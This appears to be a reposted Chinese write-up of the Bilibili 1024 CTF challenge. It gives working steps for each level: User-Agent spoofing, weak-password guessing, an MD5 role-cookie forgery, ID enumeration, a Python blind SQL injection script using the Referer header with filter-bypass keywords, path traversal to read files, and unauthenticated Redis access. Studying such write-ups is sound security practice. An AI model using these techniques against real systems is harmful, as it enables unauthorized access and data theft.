1024安全挑戰賽?9到底是啥


第一題 頁面的背后是什么?
http://45.113.201.36/index.html
發現提示:
需要使用bilibili Security Browser瀏覽器訪問
根據所學可知,這里對UA經行修改即可,使用插件Modheader
flag2: 25921e47-fcc0a773-43dcfeb2-419f22b1
但是得到的是flag2,那么flag1再哪呢,查看admin
得到flag1:
a1f5a9e7-0dedcfb8-ada8fc47-e7cd6c9c


下面直接來到第三關
隨意輸入密碼發現 提示 用戶名或密碼錯誤~
嘗試爆破密碼
一般也就這樣隨便拿個弱口令字典就開始爆破了,但是這樣正確率太低了
可以看到所有的頁面都是200會話,所以這里這樣操作不太行。
常用弱口令無非就是123456、admin、root、password等等當然還有生日
姓名縮寫或全稱、手機號、特殊紀念日這些,既然這是B站的題目肯定密碼也是
與之相關的,最后經過一番嘗試發現bilibili這符合要求
得到flag3:
20ab502d-68e68970-6a711883-f920e970

來到第四關
有些秘密只有超級管理員才能看見哦~
提示只有超級管理員才可以
超級管理員:Administrator
role:ee11cbb19052e40b07aac0ca060c23ee
解密得到 user 再次加密可知這是md5加密

Administrator:7b7bc2512ee1fedcd76bdc68926d4f7b

得到flag4:
2e7eb810-cf486f2f-a13fd301-e734a6d4

來到第5關
檢查頁面源代碼
if (uid == null) {
uid = 100336889;
}
$.ajax({
url: "api/ctf/5?uid=" + uid,
type: "get",
success:function (data) {
console.log(data);
if (data.code == 200){
// 如果有值:前端跳轉
$('#flag').html("歡迎超級管理員登陸~flag : " + data.data )
} else {
// 如果沒值
$('#flag').html("這里沒有你想要的答案~")
}

這里考到了越權
猜測正確頁面在uid = 100336889附近
對其進行遍歷,得到

flag5:
10c93648-673ee5ee-90265100-af6da3d6

來到第六關。。。。
SQL注入
import requests
url='http://45.113.201.36/blog/single.php?id=1'
flag=''
for i in range(1,100):
left=33
right=128

while right-left!=1:
mid=(left+right)//2
payload="0123'^if(substr((selselectect flag from flag),{i},1)>binary {mid},(selecselectt 1+~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
headers={
'Referer':payload
}
r=requests.get(url=url,headers=headers)
if len(r.text) == 5596:
left=mid
else:
right=mid
flag+=chr(right)
print (flag)

flag6:

a2b0883c-ffbb8d17-9a3bbf1c-ed600c80
待續,目前環境有點卡,后續補充

第七題 文件包含
http://45.113.201.36/api/images?file=../../../flag7.txt

{"code":200,"data":"7c8be76d-085cef2f-7e9950c1-3960c1ba","msg":""}

flag7:7c8be76d-085cef2f-7e9950c1-3960c1ba

第八題 redis
https://github.com/microsoftarchive/redis/releases
Redis\
執行命令
redis-cli.exe -h 45.113.201.36 -p 6379
keys *
get flag8
d436b982-2b81aa54-49a8d2db-87ab951a

第九關
http://45.113.201.36/api/images?file=../../../secret.txt
{"code":200,"data":"SkRGWDZRZnJxelJQU21YME42MU04OWlwV1l0SlYvcEJRVEJPWWFYUXVHOGZBcnJ1bjNXS3hXRlpHd05uMjFjRw==","msg":""}

base64解密:

JDFX6QfrqzRPSmX0N61M89ipWYtJV/pBQTBOYaXQuG8fArrun3WKxWFZGwNn21cG

 

 最后給假的flag9:

{flag9:f278899d-91b38854-4630afa9-af15322d}


一不小心來到了第10關
$bilibili = "bilibili1024havefun";

$str = intval($_GET['id']);
$reg = preg_match('/\d/is', $_GET['id']);

/blog/end.php?id[]=1&url=/api/ctf/6/flag.txt

flag10:2ebd3b08-47ffc478-b49a5f9d-f6099d65

 

webmaster@localhost

2. 33的挑戰狀 —— 首屆嗶哩嗶哩安全挑戰賽


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM